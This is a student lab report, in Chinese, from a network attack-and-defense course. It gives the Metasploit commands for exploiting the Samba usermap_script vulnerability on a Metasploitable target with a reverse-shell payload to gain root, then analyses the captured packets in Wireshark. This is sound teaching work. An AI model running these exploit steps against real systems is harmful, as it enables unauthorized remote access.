20242935 2024-2025-2 《网络攻防实践》第七周作业
20242935 2024-2025-2 《网络攻防实践》第七周作业
实践七 Linux操作系统攻防
一、实践要求
实践内容:
(1)使用Metasploit进行Linux远程渗透攻击
任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。
(2)实践作业:攻防对抗实践
攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
二、实验过程
任务一:使用Metasploit进行Linux远程渗透攻击
虚拟机 | IP地址 |
---|---|
Kali-Linux(攻击机) | 192.168.200.6 |
Metasploitable_ubuntu(靶机) | 192.168.200.5 |
在kali攻击机上输入指令打开metasploit软件
msfconsole
输入指令查找渗透攻击模块是否存在
search /multi/samba/usermap_script
输入指令使用渗透攻击模块
use exploit/multi/samba/usermap_script
输入指令会显示此漏洞的载荷
show payloads
选择攻击PAYLOAD为远程shell,输入指令来设置有效的攻击载荷,反向连接
set payload cmd/unix/reverse
有两个IP地址参数需要设置,分别是LHOST(本地ip地址:kali攻击机)和RHOSTS(目标ip地址:靶机Metasploitable_ubuntu)
set LHOST 192.168.200.6
set RHOST 192.168.200.5
输入指令查看信息设置
show options
输入指令开始渗透攻击
exploit
成功拿到靶机权限
通过 whoami 查询,发现我们已经获得了root权限,这表明提权成功
任务二:攻防对抗实践
攻方攻击过程:任务一已给出
对攻击过程进行的Wireshark抓包内容进行分析
可以知道攻击者IP为192.168.200.6,目标IP为192.168.200.5,目标端口号为60356
攻击机kali(192.168.200.6)向靶机(192.168.200.5)发起的TCP连接请求
攻击者在 Kali 上运行了带反向 shell 的 Metasploit Payload,连接目标主机的 4444 端口(用于 shell 通信)
192.168.200.6 > 192.168.200.5 TCP 4444 > 59055 [PSH, ACK]
192.168.200.5 > 192.168.200.6 TCP 59055 > 4444 [ACK]
靶机响应连接(ACK)
192.168.200.5 > 192.168.200.6 TCP 59056 > 4444 [PSH, ACK]
表明攻击载荷生效,shell 建立,正在传送命令或结果
攻击者继续传输(ACK)
靶机继续返回数据
查看到SMB数据包中的shellcode,nohup是no hang up的缩写,意思是不挂断,用nohup运行命令可以使命令永久的执行下去
三、学习中遇到的问题及解决
无
四、学习感想和体会
通过Wireshark筛选关键端口数据包、跟踪TCP连接流,成功还原了攻击全过程,识别出攻击者IP、目标端口、Payload传输和Shellcode的注入等核心信息。尤其是在抓包中看到nohup命令作为shellcode的一部分时,进一步理解了如何通过反向Shell在目标机上持久运行命令。